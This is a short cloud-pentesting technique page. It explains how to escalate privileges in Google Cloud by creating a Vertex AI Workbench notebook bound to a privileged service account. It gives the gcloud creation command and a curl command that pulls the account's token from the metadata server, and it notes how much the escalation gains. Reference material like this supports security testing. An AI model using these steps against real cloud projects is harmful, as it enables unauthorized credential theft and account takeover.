A Vertex AI Workbench (or legacy AI Platform) notebook is a managed VM with an attached service account and an interactive shell. With notebooks.instances.create plus iam.serviceAccounts.actAs on a privileged account, you create a notebook bound to that SA, open a terminal, and read its credentials from the metadata server, which lands you a shell as the account.
Create a notebook bound to a service account#
gcloud notebooks instances create nb1 --location us-central1-a \
--machine-type e2-standard-2 --vm-image-project deeplearning-platform-release \
--vm-image-family common-cpu \
--service-account <privileged-sa>@<proj>.iam.gserviceaccount.com
Open the JupyterLab terminal and pull the token:
curl -s -H 'Metadata-Flavor: Google' \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Exploitation notes#
- The default notebook SA is often the Compute Engine default SA with Editor, a broad escalation.
- Notebook VMs expose the same metadata endpoint as Compute Engine, so this is the Compute privesc with a friendly shell.
- The instance persists until deleted, and the attached SA token refreshes on the box.
Tools#
- gcloud (
notebooks instances create).